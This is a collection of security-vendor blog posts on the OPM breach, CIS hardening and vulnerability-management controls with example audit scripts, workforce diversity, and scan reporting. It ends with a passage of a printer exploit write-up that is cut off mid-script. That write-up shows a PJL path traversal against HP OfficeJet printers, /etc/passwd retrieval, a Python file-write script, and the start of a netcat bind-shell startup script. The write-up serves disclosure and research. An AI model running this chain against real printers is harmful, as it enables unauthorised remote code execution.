
The OPM Breach Two Years Later: Why We Need a Marathon


The White House called for a 30-day sprint in response to the devastating data breach at the Office of Personnel Management (OPM), discovered in April 2015. The immediate goal was to bring agencies’ cybersecurity up to an acceptable level. It directed agencies to implement a number of best practices, including scanning systems for known threats, patching critical vulnerabilities, managing privileged access and using multi-factor authentication. But is a sprint enough?

OPM timeline

Two years after the breach, which exposed sensitive records and personal information of 21.5 million past, present and potential federal employees, the OPM Inspector General still found the agency was struggling to meet cybersecurity requirements. OPM is not the only agency facing these challenges. The Government Accountability Office has classified federal cybersecurity as a high-risk program for 20 years.

To address today’s cybersecurity challenges, the government needs a marathon

A sprint is fine if you need to quickly meet a short-term goal, but that’s not how the government or the world should be thinking about risk or security. To address today’s cybersecurity challenges head on, the government needs a marathon. Without a resilient and comprehensive cybersecurity strategy, agencies will struggle to understand their true level of exposure and to reduce their risk.

The changing world

The federal government is frequently criticized for maintaining legacy IT systems. The House Oversight Committee last year called agencies’ reliance on outdated and unsupported technology “a ticking time bomb.” Alongside these legacy systems, agencies are adopting new computing assets like cloud, DevOps/containers and the Internet of Things (IoT) that are disrupting the traditional network perimeter to create a dynamic and boundaryless IT environment.

Alongside legacy systems, agencies are adopting new computing assets

Operational technologies (OT) like SCADA/ICS are still a major part of the government’s critical infrastructure, and while they were designed for precision and reliability, they were not built with security in mind. The rise of industrial IoT means critical devices such as medical devices, transportation systems and ICS have become internet accessible.

This convergence of IT and OT is expanding the already complex attack surface, creating additional security risks and safety concerns for chief information security officers (CISOs) who already struggle to gain visibility into their exposure areas.

Real modernization


Agencies must modernize IT systems if they are to improve their cybersecurity. But modernization requires more than merely updating or replacing legacy systems with new products and services. Real modernization requires change in how systems are architected. The systems must provide administrators with the visibility to fully monitor all assets—whether on-premises or in the cloud—in as close to real time as possible. Administrators must be able to manage them and to respond quickly to vulnerabilities, threats and attacks. This requires interoperability and the use of automation where possible, so that administrators and security personnel can apply their human intelligence where it is most needed.

Modernization will be a big job for agencies. The GAO reported to the House Oversight Committee last year that agencies spent more than 75 percent of their fiscal 2015 IT budgets on legacy equipment. Some systems still are using COBOL (the Common Business Oriented Language) for computers developed in the late 1950s and early 1960s.

Replacing these antiquated systems would be a step forward in improving cybersecurity. But completing the task of modernization will require a long-term commitment to change and will be realized only if it is prioritized by agencies, legislators and the administration. Initiatives such as President Trump’s recent Executive Order on cybersecurity can help point the way to needed changes and strategic planning. The Modernizing Government Technology bill that has been introduced in Congress would help by establishing a capital fund to help agencies finance new technology. This could jumpstart the modernization process and make it easier for agencies to make long-term plans and to respond quickly to evolving threats and technology.

Ultimately, each agency must establish and pursue its own strategic plans focusing on the long-term goal of manageable and secure information systems. Only then can the government be fully prepared to regain control of its networks and confidently manage cyber risk in today’s modern IT landscape.

More information

For more data about the OPM situation, visit the Tenable OPM web page and download the free whitepaper.


Master Your Security Foundation: Harden Your Systems


According to a survey conducted by Tenable in late 2016, only 50% of our customers use our configuration auditing capabilities. That’s the bad news. The good news is that those who do use it really like it. But back to the bad news: Tenable and the Center for Internet Security sponsored a separate research project that found that only 55% of organizations enforce secure configuration standards for laptops, workstations and servers. That leaves a lot of systems with potentially unnecessary open ports and services, weak or default passwords, overly broad user rights and other configuration weaknesses.

If you’ve read my recent blog posts, you understand the importance of having only authorized devices and software on your network. The next step, according to the CIS Critical Security Controls, is to securely configure (harden) the authorized hardware and software of your mobile devices, laptops, workstations and servers. The CIS is not alone in this recommendation – other security frameworks and compliance standards echo the importance of securely configuring your systems as well.

Standard                       “Securely Configure your Systems” Control Objective
PCI DSS                        2.2: Develop configuration standards for all system components.
NIST Cybersecurity Framework   PR.IP-1: Baseline configurations are created and maintained.
ISO/IEC 27002:2013             A.14.2.8: System security testing; A.18.2.3: Technical compliance review
NIST 800-53 rev 4              CM-2: Baseline configuration; CM-6: Configuration settings; CM-7: Least functionality

Even if you follow strict configuration management and provision secure “golden” images, you should still audit configurations frequently to identify the inevitable configuration drift that occurs as configurations are manually modified. Additionally, you should securely configure the entire stack, not just the operating system – especially for internet-facing servers. Don’t ignore virtualization, cloud infrastructure, container platforms, containers, web servers and database servers. Like the proverbial chain, security is only as strong as the weakest layer of the stack.
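
As an added illustration of the configuration drift audit described above (example code written for this discussion, not a Tenable audit file or a CIS Benchmark), the script below parses a constructed sshd_config snapshot and compares it with a small baseline. The baseline values, the sample config and the assumption that the golden image sets every baseline keyword explicitly are all assumptions made for the example. It honours two details that a naive grep misses: sshd uses the first occurrence of a keyword, so a later “PermitRootLogin no” does not undo an earlier “yes”, and settings inside a Match block apply only conditionally, so the parser stops there and leaves them for separate review.

```python
import re

# Constructed hardening baseline for OpenSSH server settings (illustrative values chosen
# for this example, not quoted from any CIS Benchmark or DISA STIG).
BASELINE = {
    "PermitRootLogin": "no",
    "PasswordAuthentication": "no",
    "PermitEmptyPasswords": "no",
    "X11Forwarding": "no",
    "MaxAuthTries": "4",
}

# Constructed sshd_config snapshot from a host that has drifted from its golden image.
SAMPLE_SSHD_CONFIG = """\
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication no
X11Forwarding no
MaxAuthTries=6
PermitRootLogin no
Match User backup
    PasswordAuthentication yes
"""

# "Keyword value" or "Keyword=value"; keywords are case-insensitive in sshd_config.
LINE_RE = re.compile(r"^(\S+?)(?:\s+|\s*=\s*)(.+)$")


def parse_sshd_config(text):
    """Return {keyword_lower: value} using sshd's rule that the FIRST occurrence of a
    keyword wins. Parsing stops at the first Match block: settings inside it apply only
    conditionally and must be reviewed against the Match criteria separately."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        settings.setdefault(key, value)  # later duplicates do not override the first value
    return settings


def audit_settings(settings, baseline=BASELINE):
    """Compare parsed settings with the baseline. Returns a list of
    (keyword, expected, actual, status) where status is "drift" (value differs) or
    "missing" (the golden image sets it explicitly, so absence is itself drift)."""
    findings = []
    for key, expected in baseline.items():
        actual = settings.get(key.lower())
        if actual is None:
            findings.append((key, expected, None, "missing"))
        elif actual.lower() != expected.lower():
            findings.append((key, expected, actual, "drift"))
    return findings


def audit_text(text, baseline=BASELINE):
    """Convenience wrapper: parse a config file's text and audit it in one call."""
    return audit_settings(parse_sshd_config(text), baseline)


if __name__ == "__main__":
    for key, expected, actual, status in audit_text(SAMPLE_SSHD_CONFIG):
        print(f"{status:8} {key}: expected {expected!r}, found {actual!r}")
```

Run against the sample, the audit reports PermitRootLogin as drifted (the first, effective value is “yes”), MaxAuthTries as drifted, and PermitEmptyPasswords as missing; the PasswordAuthentication override inside the Match block is deliberately not counted as the host-wide setting.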

Configure the entire stack, not just the operating system

You can get started with configuration standards available from multiple sources. The CIS publishes more than three dozen Benchmarks, DISA publishes a number of Security Technical Implementation Guides (STIGs), and many vendors publish their own guidelines. You may need to tailor the standards to your organization’s specific requirements. The key is to get started!

Tenable can help

Tenable offers more than 300 configuration audit files that cover multiple versions of popular operating systems, cloud infrastructure, web servers, databases, Windows productivity apps and network devices. Additionally, SecurityCenter® 5 is fully certified against Security Content Automation Protocol (SCAP) 1.2. SCAP, a methodology used to evaluate vulnerability management, measurement and policy compliance of security software solutions, is recommended by CIS to streamline reporting and integration. It also meets NIST and FISMA reporting requirements.

SecurityCenter offers three reporting mechanisms to address a range of requirements. Each can be scoped for specific business systems to focus results:

  • Reports by asset type list setting-by-setting and system-by-system audit results and identify settings requiring remediation.
  • Dashboards display compliance status, allowing users to drill into details as needed (see example below).
  • Assurance Report Cards (ARCs) communicate a compliance status overview that can be communicated to business owners and non-technical stakeholders (see example below).

CIS Audit Summary dashboard
The CIS Audit Summary dashboard organizes CIS Benchmark results by asset type. You can easily add and delete asset types to match your environment.

CIS CSC: Secure Configuration (CSC 3,11) ARC
The CIS CSC: Secure Configuration Assurance Report Card evaluates policy compliance and presents pass/fail results for each policy test.

Learn more

The CIS Critical Security Controls include seven sub-controls that support Secure Configurations for Hardware and Software. A detailed discussion of these sub-controls is beyond the scope of this blog – but we can help you learn more. Tenable is hosting a webinar on June 21st when we will dive into the control details, show you how Tenable can help and answer your questions. This webinar is the third of a five-part series that will explore each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course, Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course, Implementing and Auditing the Critical Security Controls – in Depth. In addition to presenting valuable content, we will reserve time for questions and answers.

Look for future blogs where I will discuss the remaining Foundational Cyber Hygiene controls:

  • Continuous vulnerability assessment and remediation
  • Controlled use of administrative privileges

A Personal Perspective on Closing the Cyber Diversity Gap


I’ve been in IT for the last 16 years, nearly two of which have been in cybersecurity. I was recently given public platforms to discuss my views on diversity in the industry. The crazy part is how close I came to never actually having a career in tech.

The first opportunity came following my recognition as Minority Practitioner of the Year by the International Consortium of Minority Cybersecurity Professionals (ICMCP). And most recently, I joined over 100 women at the Executive Women’s Forum (EWF) Cybersecurity Women on Capitol Hill.

The day-long EWF event was a chance to meet dozens of women in both the private and public sector leading the way in cybersecurity. The night ended with a speech from Tenable CEO Amit Yoran, where he discussed his commitment to improving diversity through public and private sector partnership.

More than anything, these opportunities lit a fire under me and motivated me to learn more, stay active in the field and engage with other women in cybersecurity.

Women form only 11 percent of the global cybersecurity workforce

But taking a step back, I realize just how close I was to never stepping foot in the tech industry. Funny enough, my career in IT was coincidental. It all started while I was an executive assistant for an IT director. Although I didn’t actively pursue a position in IT, I was recognized for my tech savviness, and was given the opportunity to join the end-user support team.

Since then, I’ve gone from helpdesk support to customer support, to working on a full scale security team. Seven of my last years in IT have been at Tenable, where I’ve seen the company grow from a 100-person startup, to a global cybersecurity leader.

I’ve often wondered how different my career path and life would have been if I hadn’t been noticed by that manager. Would I have eventually found my way to tech? Or would I have been too timid to step outside of my comfort zone and pursue my dream?


Unfortunately, my situation isn’t unique. A lack of early exposure to science, technology, engineering and math (STEM) programs, mentorship and inclusive company cultures has created hurdles for women to join the cybersecurity industry – hurdles that have resulted in women forming only 11 percent of the global cybersecurity workforce, according to a study done by EWF.

While increased awareness of this problem has helped to close the diversity gap, we need to do more to ensure that women and minorities don’t enter cybersecurity only by chance.

Early exposure

Exposure to new ideas, thoughts and opportunities is what enables us to grow. That’s why access to and encouragement of STEM education is so important. Without early childhood exposure to math, science and technology, girls can quickly become hesitant and discouraged from exploring these fields.

Growing up, I was never exposed to technology in school. But unlike many years ago, advancements have brought computers and mobile devices to virtually every classroom — an opportunity we need to jump on. While there is currently strong momentum around STEM, we need to continue to bring well-funded programs to every school, and ensure that young girls and minorities are encouraged and motivated to pursue the field.

Mentorship

One of the key factors to a long and successful career in tech is strong mentorship. But women who enter the cybersecurity workforce are often left without mentors to help them navigate a male-dominated industry.


It’s no secret that women have long been overlooked by customers, colleagues and even managers, simply because of our gender. This is something most, if not all, women experience in IT and elsewhere. And it’s one more reason why promoting female leadership and mentorship is so important.

Company culture

You often spend more time at work than you do at home, which is why company culture is critical to success. I’ve been lucky enough to spend my work hours at Tenable, a company that is committed to its employees, ensuring that everyone’s voice is heard.

Although the industry has leaps and bounds to make when it comes to diversity, we can start by fostering an inclusive company culture where diversity of thought and approach is celebrated and embraced.

The road ahead

There’s no doubt that the industry has a long road ahead when it comes to closing the diversity gap. But I’m confident that we’re moving in the right direction. Change won’t happen overnight, but we need to stay focused on the areas that matter most: encouraging young girls to pursue STEM, mentoring the next generation of women in cybersecurity and developing inclusive work cultures that promote creativity and diversity.

Continued support and collaboration of industry and government leaders, such as those at the EWF Cybersecurity Women on Capitol Hill event, is critical to tackling this issue.

This blog originally appeared on LinkedIn.

Tracking Down Privilege Escalation Failures

Tenable.io Vulnerability Management Reports

Credentialed scanning is a key aspect of any vulnerability management program, but how can you be sure the scans are successful? Changes to infrastructure or specific hosts could result in the wrong credentials being used to elevate privileges during scans. If this happens, your scans could fail to gather the vulnerability data essential to effectively implementing your vulnerability management plan. The Tenable.io™ Elevated Privilege Failures report can give you detailed insight into the *nix hosts in your network that may not be getting scanned as thoroughly as believed.

Privilege escalation in credentialed scans


When SSH is used for credentialed scanning, you have the option of specifying an account to use for privilege elevation. This feature lets the scan log in via SSH with a non-root account. The scan then escalates privileges with the configured root account to gather data that is not available to non-root users. Logging in and elevating privileges as two separate steps keeps root credentials off the wire, which is more secure. Therefore, configuring a non-root account on all scan targets is recommended when running credentialed scans.

Elevated Privilege Failures report: scan credentials

The Tenable.io solution

Tenable.io can efficiently identify hosts where privilege escalation in credentialed scans has failed. The Elevated Privilege Failures report provides detailed information on these hosts.

Elevated Privilege Failures report

The Elevated Privilege Failures report provides you with comprehensive and detailed lists of the hosts on your network that may not be getting scanned thoroughly. This information is broken down by operating system and host. The Elevated privilege failure summary by Operating System pie chart shows privilege escalation failures by operating system and could indicate whether recent configuration changes may have caused the failures to start happening. For example, you will be better able to track the source of failures if the root account password has been changed for a specific operating system but not network-wide.

Elevated Privilege Failures report pie chart

The Systems with elevated privilege failures table lists the hosts on which failures were detected, based on the results of the Authenticated Check: OS Name and Installed Package Enumeration plugin (ID 12634). The table filters for plugin results that contain a phrase indicating that local privileges were not successfully elevated. This table also acts as an index for the next table, which provides more in-depth information about the hosts impacted.

Elevated Privilege Failures report IP list

The vulnerability details table lists results from plugin ID 12634, including the plugin output, for each host impacted. Details about the host, such as the IP and MAC addresses, are provided along with the plugin output that describes the attempt and failure to elevate the privileges of the scan account.

Elevated Privilege Failures report IP detail

Regardless of your approach to credentialed vulnerability scanning with Tenable.io, ensuring proper credential configuration is the first step to gathering thorough scan results. Tenable.io provides information security professionals with the tools and resources needed to perform accurate and rigorous credentialed vulnerability scanning. The Elevated Privilege Failures report provides insight into potential failures impacting the accuracy of credentialed scanning. Armed with Tenable.io, you can be sure that your credentialed scans are able to gather all available data.


Try Tenable.io

Tenable.io provides accurate information on how well your organization is addressing security risks and helps track improvements over time. Get a free trial of Tenable.io Vulnerability Management for 60 days.

Master Your Security Foundation: CIS Vulnerability Management Controls


Most of us are likely very familiar with vulnerability management. Unfortunately, familiarity with vulnerability management doesn’t necessarily equate to mastery. According to a survey sponsored by Tenable and the Center for Internet Security (CIS) in late 2016, about half of the surveyed organizations need to significantly improve their vulnerability management practice. The following data tell the story:

  • Only 56% use automated tools to perform any type of vulnerability scanning.
  • Only 51% use automated tools to scan all network systems for vulnerabilities on at least a weekly basis.
  • Only 36% verify that important vulnerabilities with available patches were addressed within two weeks.

Note: The CIS Controls were formerly known as the Center for Internet Security Critical Security Controls (CSC).

The fourth of the five CIS Controls (CSC), Continuous Vulnerability Assessment and Remediation, is described as:

continuously acquiring, assessing and taking action on new information in order to identify vulnerabilities, remediate and minimize the window of opportunity for hackers.

CSC 4 includes eight sub-controls that will help you improve your vulnerability management program. Here is an overview of several sub-controls.

Run automated vulnerability scans against all systems at least weekly and deliver a prioritized vulnerability list to system administrators (see CIS Control 4.1). As the above survey data shows, only about half of organizations scan all systems weekly. If yours is not yet scanning weekly, it may be relatively easy for your security team to begin scanning more frequently. However, if you don’t significantly pare down your list of vulnerabilities to those that are most important, you can easily bury your IT operations colleagues and deter them from taking action on your vulnerability reports. As an example, you can pare down your list by including only critical and high vulnerabilities that have an exploit available.

Perform vulnerability scanning in authenticated mode or with agents (see CIS Control 4.3). External, non-authenticated scanning only provides a surface picture. You need to assess your systems from the inside out to identify OS and application/service vulnerabilities.

Subscribe to vulnerability intelligence services (see CIS Control 4.4). First, you need to ensure that your vulnerability scanning tool is regularly updated with all relevant important vulnerabilities. Second, if one is available, you should join an industry-specific threat intelligence service to identify the threats that target organizations like yours. This intelligence should help you identify vulnerabilities that require prompt remediation.

Deploy automated patch management tools (see CIS Control 4.5). Realistically, automation is the only way to remediate the majority of high-priority vulnerabilities. This certainly applies to servers and desktops running popular operating systems and popular applications. You may need to apply manual patches or implement compensating controls for some systems, but this should be the exception.

Verify that vulnerabilities were addressed (see CIS Control 4.7). It is not enough to throw a prioritized vulnerability list over the wall to your operations colleagues. You need to work with them to measure the results using a closed-loop vulnerability management process. Jointly develop reasonable goals to establish some quick wins and measure progress over time as you continuously improve.

Establish a process to risk-rate vulnerabilities (see CIS Control 4.8). This sub-control is an expansion of CSC 4.1, which includes basic prioritization. Here, the recommendation is to incorporate risk-based prioritization with the addition of knowledge about the assets you need to protect. Identify the assets with the lowest risk tolerance and remediate those first. You may also want to scan these assets more frequently.
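
To make the two prioritization steps above concrete, here is an added example (written for this discussion, not Tenable code and not a SecurityCenter component) that applies the CIS Control 4.1 cut described earlier, keeping only critical and high findings with an exploit available, and then the CIS Control 4.8 risk rating, which folds in how much risk each asset tolerates. The hosts, vulnerability labels, asset tiers and scoring weights are all constructed assumptions for the example.

```python
from dataclasses import dataclass

# Severity order used for both cuts below.
SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1}


@dataclass(frozen=True)
class Finding:
    host: str
    name: str               # vulnerability label (constructed placeholders below, not real CVEs)
    severity: str           # critical / high / medium / low
    exploit_available: bool
    patch_age_days: int     # days since a fix became available
    asset_tier: int         # 1 = lowest risk tolerance (e.g. internet-facing), 3 = highest


def basic_prioritized(findings):
    """CIS Control 4.1 style cut, as the post suggests: keep only critical/high findings
    that have a public exploit, most severe and longest-unpatched first."""
    keep = [f for f in findings if SEVERITY_RANK[f.severity] >= 3 and f.exploit_available]
    return sorted(keep, key=lambda f: (-SEVERITY_RANK[f.severity], -f.patch_age_days))


def risk_score(f):
    """CIS Control 4.8 style rating (weights are assumptions for this example): severity is
    multiplied by how little risk the asset tolerates, then bumped for a public exploit
    and again if the patch has been available longer than the two-week window."""
    score = SEVERITY_RANK[f.severity] * (4 - f.asset_tier)
    if f.exploit_available:
        score += 3
    if f.patch_age_days > 14:
        score += 2
    return score


def risk_rated(findings):
    """Full list, highest risk first; ties broken by host name for stable output."""
    return sorted(findings, key=lambda f: (-risk_score(f), f.host))


# Constructed sample findings (hosts and vulnerability labels are placeholders).
SAMPLE_FINDINGS = [
    Finding("web01",   "rce-placeholder-a",     "critical", True,  30, 1),
    Finding("db01",    "privesc-placeholder-b", "high",     True,  10, 1),
    Finding("kiosk07", "dos-placeholder-c",     "critical", False, 40, 3),
    Finding("lab22",   "rce-placeholder-d",     "high",     True,   3, 3),
    Finding("web01",   "info-placeholder-e",    "medium",   True,  60, 1),
]


if __name__ == "__main__":
    print("CSC 4.1 cut (critical/high with exploit):")
    for f in basic_prioritized(SAMPLE_FINDINGS):
        print(f"  {f.host:8} {f.name:24} {f.severity}")
    print("CSC 4.8 risk-rated:")
    for f in risk_rated(SAMPLE_FINDINGS):
        print(f"  {f.host:8} {f.name:24} score={risk_score(f)}")
```

The two outputs differ in an instructive way: the basic cut drops the medium finding on web01 entirely, while the risk rating places it above the high finding on the lab host, because the internet-facing asset tolerates far less risk. Which ordering you hand to operations depends on how mature the program is, which is exactly the progression from sub-control 4.1 to 4.8.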


Tenable can help

It should not be surprising that Tenable knows vulnerability management. However, you may not know that we have tailored a SecurityCenter Continuous View® dashboard and an Assurance Report Card® specifically for CIS Control 4. Both are templates that you can readily adapt to your specific requirements.

CIS CSC: Vulnerability Management (CSC 4) dashboard

The CIS Vulnerability Management dashboard provides a clear picture of your vulnerability management status

The Track Mitigation Progress component in the upper left of the CIS CSC: Vulnerability Management (CSC 4) dashboard is especially useful. You can scope it to specific assets to track the mitigation status of the top exploitable hosts based on vulnerability criticality, exploitability and how long a patch has been available.

Track Mitigation Progress component

You can use the CIS CSC Vulnerability Management Assurance Report Card during monthly meetings with IT operations staff to jointly manage a closed-loop vulnerability management process. As your program matures, you can increase the thresholds to drive additional improvement.

CIS CSC Vulnerability Management Assurance Report Card

The CIS CSC: Vulnerability Management ARC helps you communicate status to IT leadership

Learn more

During an upcoming Tenable webinar on June 28, Brian Ventura, a SANS Community Instructor, will dive into the details of each of the sub-controls and show you how Tenable supports CIS Control 4. We will also reserve time for questions and answers.

Even if you can’t attend, please register so we can send you a link to the recorded webinar to watch at your convenience.

Watch for my final blog in this series on Foundational Cyber Hygiene controls; CIS Control 5 is all about controlled use of administrative privileges.

Rooting a Printer: From Security Bulletin to Remote Code Execution


Printers. They are everywhere. In big businesses. In small businesses. In our homes. In our schools. Wherever you go, there they are. But where are they in your threat model? When was the last time you updated the firmware? Do you know if there are public exploits for your printer?

For example, in early April, Hewlett Packard released a security bulletin titled, HP PageWide Printers, HP OfficeJet Pro Printers, Arbitrary Code Execution. The bulletin states:

A potential security vulnerability has been identified with certain HP printers. This vulnerability could potentially be exploited to execute arbitrary code.

That’s not an especially useful summary since most customers will stop reading at “potential.” Even more useless is the description of the assigned CVE (2017-2741). At the time of writing, over two months after the HP security bulletin, the CVE lacks any type of description because it remains in the “RESERVED” state.

Ever curious, the Tenable reverse engineers were intrigued by this “potential” security vulnerability that was given a CVSSv2 score of 9.8. Always willing to indulge our curiosity, we purchased a couple of printers listed in the advisory (HP OfficeJet Pro 8210).

HP printers

A new type of printer stack

Purchasing new hardware and hoping the vulnerable firmware is still installed is always a gamble. Who knows how much work it will require to undo the patching? Fortunately, both printers arrived with vulnerable firmware installed and updates disabled.

Firmware details in the web interface

Firmware details in the web interface

One of the many frustrating things about Hewlett Packard’s security bulletin is that it tells the reader to download the firmware update from www.hp.com/support. Good luck with that though; the OfficeJet Pro 8210’s firmware isn’t available for download. However, using the Install updates automatically and Check now features on the printer’s web interface, we were able to update a printer to a patched firmware.

Firmware patched

At this point, we had both a patched and an unpatched printer. Time to start digging for remote code execution.

We started with an Nmap scan to find the open printer’s ports:

albinolobster@ubuntu:~$ nmap -A 192.168.1.159

Starting Nmap 7.01 ( https://nmap.org ) at 2017-06-08 10:31 PDT
Nmap scan report for HP0A6BFE.westeros (192.168.1.159)
Host is up (0.014s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
443/tcp   open  ssl/https  HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
515/tcp   open  printer
631/tcp   open  ssl/ipp    HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
8080/tcp  open  http-proxy HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A;
9100/tcp  open  jetdirect?

There’s nothing too surprising here. HTTP servers listening on ports 80, 443, and 8080. Line Printer Daemon (LPD) on port 515. Internet Printing Protocol (IPP) on port 631. Nmap flags port 9100 as “jetdirect?” which generally means “raw printing” or port 9100 printing.

HP refers to port 9100 printing as “HP proprietary,” but it’s widely known that it supports raw printing as well as PCL, PostScript, and PJL. Here’s a simple example of using PJL over port 9100 to get the printer’s device information:

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL INFO ID
@PJL INFO ID
"HP OfficeJet Pro 8210"

Jens Müller recently wrote a paper titled Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices that details common vulnerabilities in printers. One of the common vulnerabilities the author presents is path traversal via PJL. For example, consider the following PJL command for listing a directory on the printer:

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/" ENTR
tmp/ TYPE=DIR
csr_misc/ TYPE=DIR

You can see the directory name being listed is 0:/ and that the printer responds with two sub-directories: tmp/ and csr_misc/. What happens if you try to move up a couple of directories using the path 0:/../../?

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1
rw/ TYPE=DIR
ram/ TYPE=DIR
rom/ TYPE=DIR
.sig/ TYPE=DIR

As you can see, the printer responds with a new list of directories. It looks like we might have an attack vector here. Below, you can see that executing the same PJL command on the patched printer generates a FILEERROR. We know HP has fixed this between our two firmware versions. There is a good chance this could lead to the security bulletin’s remote code execution.

albinolobster@ubuntu:~$ nc 192.168.1.159 9100
@PJL FSDIRLIST NAME="0:/../../" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../"
FILEERROR=0

However, this traversal doesn’t seem immediately useful. The file structure doesn’t look like any root filesystem that I’m familiar with. Perhaps there is another directory traversal vector?

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="../../" ENTRY=1 COUNT=4
@PJL FSDIRLIST NAME="../../"
FILEERROR=0

@PJL FSDIRLIST NAME="../../bin/" ENTRY=1 COUNT=4
@PJL FSDIRLIST NAME="../../bin/" ENTRY=1
getopt TYPE=FILE SIZE=880020
setarch TYPE=FILE SIZE=880020
dd TYPE=FILE SIZE=880020
cp TYPE=FILE SIZE=880020

Here, I tried ../../ but that generated a FILEERROR. However, ../../bin lists files that you’d find in a traditional Linux /bin directory. It appears you can traverse into the Linux filesystem.

But how can you turn these directory traversals into remote code execution? First, you need to know a few other PJL commands: FSQUERY, FSUPLOAD, and FSDOWNLOAD. These three commands will give you r/w access to the printer’s filesystems. For example, I can leverage FSQUERY and FSUPLOAD with the directory traversal to retrieve the contents of /etc/passwd:

@PJL FSUPLOAD NAME="../../etc/passwd" OFFSET=0 SIZE=648
@PJL FSUPLOAD FORMAT:BINARY NAME="../../etc/passwd" OFFSET=0 SIZE=648
root:x:0:0:root:/var/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
ftp:x:83:83:ftp:/home/ftp:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
default:x:1000:1000:Default non-root user:/home/default:/bin/sh
 _ntp:x:100:99:Linux User,,,:/run/ntp:/bin/false

Who cares about reading files though? I want to write them. FSDOWNLOAD requires sending the ESC character, so instead of using Netcat I’ve written a Python script that tries to write to ../../tmp/writing_test:

import socket
import sys

test = ('test')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

# FSDOWNLOAD header: declare the payload size and target path, then send the raw
# bytes, then the Universal Exit Language (UEL) sequence. UEL begins with ESC and
# tells the printer the PJL job is finished, which is why Netcat alone won't do.
dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(test)) + ' NAME="../../tmp/writing_test"\r\n'
dir_query += test
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

Unfortunately, this script fails to write the file. It appears the process interpreting the PJL doesn’t have write access on the Linux filesystem:

albinolobster@ubuntu:~$ python write_test.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSQUERY NAME="../../tmp/writing_test"
@PJL FSQUERY NAME="../../tmp/writing_test"
FILEERROR=0

This is a big blow to our attempt to gain remote code execution. Without access to the Linux filesystem, the odds of replacing a binary or getting a Bash script executed are greatly diminished. At this point, our only hope is that the 0:/ filesystem is writable and that a file written there can get executed in some way.

I’ll spare you the boring details of combing through the 0:/ filesystem, but I eventually noticed that there was some overlap with the Linux filesystem. In particular, 0:/../../rw/var/etc/profile.d/ caught my eye because, traditionally, the profile.d directory contains scripts that get executed at startup. Furthermore, the directories appeared to contain the same data:

albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="0:/../../rw/var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="0:/../../rw/var/etc/profile.d/" ENTRY=1
.sig/ TYPE=DIR

@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1
.sig/ TYPE=DIR

In order to test if I could write to profile.d via the 0:/ filesystem, I updated the FSDOWNLOAD Python script to write a file to 0:/../../rw/var/etc/profile.d/writing_test:

import socket
import sys

test = ('test')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(test)) + ' NAME="0:/../../rw/var/etc/profile.d/writing_test"\r\n'
dir_query += test
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

As you can see below, the Python script now works! The new file is also visible via traversal of the Linux filesystem:

albinolobster@ubuntu:~$ python write_test.py 192.168.1.158 9100
connecting to 192.168.1.158 port 9100
albinolobster@ubuntu:~$ nc 192.168.1.158 9100
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1 COUNT=1024
@PJL FSDIRLIST NAME="../../var/etc/profile.d/" ENTRY=1
.sig/ TYPE=DIR
writing_test TYPE=FILE SIZE=4

You now have write access to a location that likely contains startup scripts. You are so close to remote code execution. Now you just need to write a script and figure out how to reboot the printer so the script will get executed.

The obvious choice for our startup script is one that will give us shell access. Since the printer has netcat installed, I chose to create a script that creates a bind shell on port 1270:

if [ ! -p /tmp/pwned ]; then
    mkfifo /tmp/pwned
